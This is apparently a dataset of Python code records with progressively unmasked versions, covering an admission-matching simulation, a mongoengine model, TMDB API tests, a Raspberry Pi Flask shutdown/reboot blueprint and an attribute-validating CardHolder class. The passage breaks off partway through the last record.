url = '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/' + str(
cnt) + "-" + str(a) + "-" + str(b) + 'DA-Q.txt'
np.savetxt(url, df_stu, delimiter=',', fmt='%d')
return df_stu
#def stu_summary(df_stu):
res0 = simulation(4, 0.7, 0.8)
#def do_simulation():
print(res0)
|
normal
|
{
"blob_id": "cad00f80afa142b69ced880de000b6b5b230640c",
"index": 6228,
"step-1": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\n<mask token>\nprint(res0)\n",
"step-3": "<mask token>\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\nres0 = simulation(4, 0.7, 0.8)\nprint(res0)\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport pprint\nimport datamake\nimport dafunc_H\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n univ = datamake.univ_make(df, df_collist)\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n url = (\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/'\n + str(cnt) + '-' + str(a) + '-' + str(b) + 'DA-Q.txt')\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n return df_stu\n\n\nres0 = simulation(4, 0.7, 0.8)\nprint(res0)\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport random\nimport csv\nimport pprint\nimport datamake\nimport dafunc_H\n\n\ndef simulation(cnt, a, b):\n df, df_collist = datamake.make_df(\n '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/csvdata/sinhuri2018.csv'\n )\n n, m, k = datamake.stu_num()\n df_stu = np.zeros((1, n + 1))\n\n for j in range(cnt):\n random.seed(48 + j)\n student = datamake.make_stu(n, m, k, a, b)\n #print(df_collist)\n univ = datamake.univ_make(df, df_collist)\n\n for i in range(200):\n dafunc_H.da_H(student, univ, df_collist)\n\n if j == 0:\n df_stu = student[:, 0:5].T.copy()\n\n else:\n df_stuadd = student[:, 0:5].T.copy()\n df_stu = np.vstack((df_stu, df_stuadd))\n\n url = '/Users/masato/Desktop/UTTdata/prog/PyProgramming/DA_algorithm/Mavo/Result/' + str(\n cnt) + \"-\" + str(a) + \"-\" + str(b) + 'DA-Q.txt'\n\n np.savetxt(url, df_stu, delimiter=',', fmt='%d')\n\n return df_stu\n\n\n#def stu_summary(df_stu):\n\nres0 = simulation(4, 0.7, 0.8)\n\n#def do_simulation():\n\nprint(res0)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from mongoengine import Document, StringField, BooleanField, ListField, Q
import exceptions
class Category(Document):
id = StringField(primary_key=True)
name = StringField()
is_base_expenses = BooleanField(default=False)
aliases = ListField(StringField())
@classmethod
def get_category_by_text(cls, category_text: str) ->'Category':
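        # Match either the exact category name or one of its lowercase aliases.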
try:
category = cls.objects.get(Q(name=category_text) | Q(aliases=
category_text.lower()))
except Category.DoesNotExist:
raise exceptions.InvalidCategory(
'Нет такой категории по имени или алиасам')
return category
|
normal
|
{
"blob_id": "63d9a0fa0d0747762e65f6f1e85e53090035454c",
"index": 583,
"step-1": "<mask token>\n\n\nclass Category(Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Category(Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-3": "<mask token>\n\n\nclass Category(Document):\n id = StringField(primary_key=True)\n name = StringField()\n is_base_expenses = BooleanField(default=False)\n aliases = ListField(StringField())\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-4": "from mongoengine import Document, StringField, BooleanField, ListField, Q\nimport exceptions\n\n\nclass Category(Document):\n id = StringField(primary_key=True)\n name = StringField()\n is_base_expenses = BooleanField(default=False)\n aliases = ListField(StringField())\n\n @classmethod\n def get_category_by_text(cls, category_text: str) ->'Category':\n try:\n category = cls.objects.get(Q(name=category_text) | Q(aliases=\n category_text.lower()))\n except Category.DoesNotExist:\n raise exceptions.InvalidCategory(\n 'Нет такой категории по имени или алиасам')\n return category\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# coding: utf-8
# 2019/11/27 @ tongshiwei
import pytest
def test_api(env):
assert set(env.parameters.keys()) == {"knowledge_structure", "action_space", "learning_item_base"}
@pytest.mark.parametrize("n_step", [True, False])
def test_env(env, tmp_path, n_step):
from EduSim.Envs.KSS import kss_train_eval, KSSAgent
agent = KSSAgent(env.action_space)
kss_train_eval(
agent,
env,
max_steps=20,
max_episode_num=10,
level="summary",
)
|
normal
|
{
"blob_id": "b1ae3abb6decf4d70bc2372e70cf4f5b868e805d",
"index": 8756,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\[email protected]('n_step', [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n kss_train_eval(agent, env, max_steps=20, max_episode_num=10, level=\n 'summary')\n",
"step-4": "import pytest\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {'knowledge_structure',\n 'action_space', 'learning_item_base'}\n\n\[email protected]('n_step', [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n kss_train_eval(agent, env, max_steps=20, max_episode_num=10, level=\n 'summary')\n",
"step-5": "# coding: utf-8\n# 2019/11/27 @ tongshiwei\n\nimport pytest\n\n\ndef test_api(env):\n assert set(env.parameters.keys()) == {\"knowledge_structure\", \"action_space\", \"learning_item_base\"}\n\n\[email protected](\"n_step\", [True, False])\ndef test_env(env, tmp_path, n_step):\n from EduSim.Envs.KSS import kss_train_eval, KSSAgent\n agent = KSSAgent(env.action_space)\n\n kss_train_eval(\n agent,\n env,\n max_steps=20,\n max_episode_num=10,\n level=\"summary\",\n )\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from flask import Blueprint, render_template, redirect, url_for, flash
import subprocess
def check_output(*args):
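    # Run the command and return its captured standard output (bytes).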
return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]
mod = Blueprint('system', __name__)
@mod.route('/')
def index():
uptime = check_output(["uptime"])
return render_template('system/system.html', uptime=uptime)
@mod.route('/shutdown')
def shutdown():
flash("Shutting down.<br>When the LEDs on the board stop flashing, \
it should be safe to unplug your Raspberry Pi.")
subprocess.call(["sudo", "halt"])
return redirect(url_for('system.index'))
@mod.route('/reboot')
def reboot():
flash("Rebooting... please wait.<br>This will take approx. one minute.")
subprocess.call(["sudo", "reboot"])
return redirect(url_for('system.index'))
|
normal
|
{
"blob_id": "e056a1600b620519e729c597dcec57793284019a",
"index": 1470,
"step-1": "<mask token>\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\n<mask token>\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
"step-3": "<mask token>\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\nmod = Blueprint('system', __name__)\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
"step-4": "from flask import Blueprint, render_template, redirect, url_for, flash\nimport subprocess\n\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\n\nmod = Blueprint('system', __name__)\n\n\[email protected]('/')\ndef index():\n uptime = check_output(['uptime'])\n return render_template('system/system.html', uptime=uptime)\n\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\n 'Shutting down.<br>When the LEDs on the board stop flashing, it should be safe to unplug your Raspberry Pi.'\n )\n subprocess.call(['sudo', 'halt'])\n return redirect(url_for('system.index'))\n\n\[email protected]('/reboot')\ndef reboot():\n flash('Rebooting... please wait.<br>This will take approx. one minute.')\n subprocess.call(['sudo', 'reboot'])\n return redirect(url_for('system.index'))\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom flask import Blueprint, render_template, redirect, url_for, flash\nimport subprocess\n\ndef check_output(*args):\n return subprocess.Popen(*args, stdout=subprocess.PIPE).communicate()[0]\n\nmod = Blueprint('system', __name__)\n\[email protected]('/')\ndef index():\n uptime = check_output([\"uptime\"])\n return render_template('system/system.html', uptime=uptime)\n\[email protected]('/shutdown')\ndef shutdown():\n flash(\"Shutting down.<br>When the LEDs on the board stop flashing, \\\n it should be safe to unplug your Raspberry Pi.\")\n subprocess.call([\"sudo\", \"halt\"])\n return redirect(url_for('system.index'))\n\[email protected]('/reboot')\ndef reboot():\n flash(\"Rebooting... please wait.<br>This will take approx. one minute.\")\n subprocess.call([\"sudo\", \"reboot\"])\n return redirect(url_for('system.index'))\n",
"step-ids": [
1,
4,
5,
6,
7
]
}
|
[
1,
4,
5,
6,
7
] |
import random
#quicksort a list of objects based on keys, which can be any of 3 values
# done in O(n) time in one pass, and O(1) additional space complexity
def quicksort(x, pivot_index):
key1_idx, key2_idx, key3_idx = 0, 0, len(x)
key1_val, key2_val= 'key1', 'key2'
while key2_idx < key3_idx:
if x[key2_idx]['key'] == key1_val:
x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]
key1_idx, key2_idx = key1_idx + 1, key2_idx + 1
elif x[key2_idx]['key'] == key2_val:
key2_idx += 1
else:
key3_idx -= 1
x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]
return x
if __name__ == '__main__':
keys = ['key1', 'key2', 'key3']
values = [0, 1, 2, 3, 4]
key_values = [{'key': key, 'value': value} for key in keys for value in values]
random.shuffle(key_values)
print(quicksort(key_values, 7))
|
normal
|
{
"blob_id": "f193094c551df2a32860948b1a8710b53ca0dfb6",
"index": 2413,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n key_values = [{'key': key, 'value': value} for key in keys for value in\n values]\n random.shuffle(key_values)\n print(quicksort(key_values, 7))\n",
"step-4": "import random\n\n\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val = 'key1', 'key2'\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n return x\n\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n key_values = [{'key': key, 'value': value} for key in keys for value in\n values]\n random.shuffle(key_values)\n print(quicksort(key_values, 7))\n",
"step-5": "import random\n\n#quicksort a list of objects based on keys, which can be any of 3 values\n# done in O(n) time in one pass, and O(1) additional space complexity\ndef quicksort(x, pivot_index):\n key1_idx, key2_idx, key3_idx = 0, 0, len(x)\n key1_val, key2_val= 'key1', 'key2'\n\n while key2_idx < key3_idx:\n if x[key2_idx]['key'] == key1_val:\n x[key1_idx], x[key2_idx] = x[key2_idx], x[key1_idx]\n key1_idx, key2_idx = key1_idx + 1, key2_idx + 1\n elif x[key2_idx]['key'] == key2_val:\n key2_idx += 1\n else:\n key3_idx -= 1\n x[key2_idx], x[key3_idx] = x[key3_idx], x[key2_idx]\n\n return x\n\nif __name__ == '__main__':\n keys = ['key1', 'key2', 'key3']\n values = [0, 1, 2, 3, 4]\n\n key_values = [{'key': key, 'value': value} for key in keys for value in values]\n random.shuffle(key_values)\n\n print(quicksort(key_values, 7))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# project/tests/test_tmdb.py
import unittest
import json
from project.server import db
from project.server.models import Tmdb
from project.tests.base import BaseTestCase
class TestTmdb(BaseTestCase):
"""
Testing if we have the good responses from the api
"""
def test_discover(self):
""" Testing the TMDB API discover endpoint """
response = Tmdb.discover()
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_search(self):
""" Testing the TMDB API search endpoint """
response = Tmdb.search('ozark')
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_detail(self):
""" Testing the TMDB API get show """
response = Tmdb.detail(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(data['id'])
self.assertTrue(data['name'])
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_similar(self):
""" Testing the TMDB API similar endpoint """
response = Tmdb.similar(69740)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['results'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
def test_seasons(self):
""" Testing the TMDB API seasons endpoint """
response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)
self.assertTrue(int(response.status_code) == 200)
data = response.json()
self.assertTrue(isinstance(data['episodes'], list))
# TODO check if all the shows are in the good format (can be from_dict/to_dict)
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "9e9403ea1c128e07803d080b337003055759c5ae",
"index": 4507,
"step-1": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n <mask token>\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n <mask token>\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n\n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id=69740, season_number=1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n\n\n<mask token>\n",
"step-5": "# project/tests/test_tmdb.py\n\n\nimport unittest\nimport json\n\nfrom project.server import db\nfrom project.server.models import Tmdb\nfrom project.tests.base import BaseTestCase\n\n\nclass TestTmdb(BaseTestCase):\n \"\"\"\n Testing if we have the good responses from the api\n \"\"\"\n def test_discover(self):\n \"\"\" Testing the TMDB API discover endpoint \"\"\"\n response = Tmdb.discover()\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_search(self):\n \"\"\" Testing the TMDB API search endpoint \"\"\"\n response = Tmdb.search('ozark')\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_detail(self):\n \"\"\" Testing the TMDB API get show \"\"\"\n response = Tmdb.detail(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(data['id'])\n self.assertTrue(data['name'])\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n\n def test_similar(self):\n \"\"\" Testing the TMDB API similar endpoint \"\"\"\n response = Tmdb.similar(69740)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['results'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n def test_seasons(self):\n \"\"\" Testing the TMDB API seasons endpoint \"\"\"\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)\n \n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
10
]
}
|
[
4,
5,
6,
7,
10
] |
class CardHolder:
acctlen = 8
retireage = 59.5
def __init__(self, acct, name, age, addr):
self.acct = acct
self.name = name
self.age = age
self.addr = addr
def __getattribute__(self, item): # __getattribute__ intercepts calls for all
# attributes (defined and undefined)
superget = object.__getattribute__ # We have to use __getattribute__ of object
# class (superclass) to prevent looping
if item == 'acct':
return superget(self, 'acct')[:-3] + '***'
elif item == 'remain':
return superget(self, 'retireage') - superget(self, 'age')
else:
return superget(self, item)
def __setattr__(self, key, value):
if key == 'name':
value = value.lower().replace(' ', '_')
elif key == 'age':
if value < 0 or value > 130:
raise ValueError('invalid age')
elif key == 'acct':
value = value.replace('-', '')
if len(value) != self.acctlen:
raise TypeError('invalid acct number')
elif key == 'remain':
raise TypeError('cannot set remain')
self.__dict__[key] = value
if __name__ == '__main__':
bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')
print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')
bob.name = 'Bob Q. Smith'
bob.age = 50
bob.acct = '23-45-67-89'
print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')
sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')
print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')
try:
sue.age = 200
except Exception:
print('Bad age for Sue')
try:
sue.remain = 5
except Exception:
print("Can't set sue.remain")
try:
sue.acct = '1234567'
except Exception:
print('Bad acct for Sue')
|
normal
|
{
"blob_id": "602a7676129721dbfd318407dd972f80d681146c",
"index": 3062,
"step-1": "class CardHolder:\n <mask token>\n <mask token>\n <mask token>\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
"step-2": "class CardHolder:\n <mask token>\n <mask token>\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
"step-3": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\n<mask token>\n",
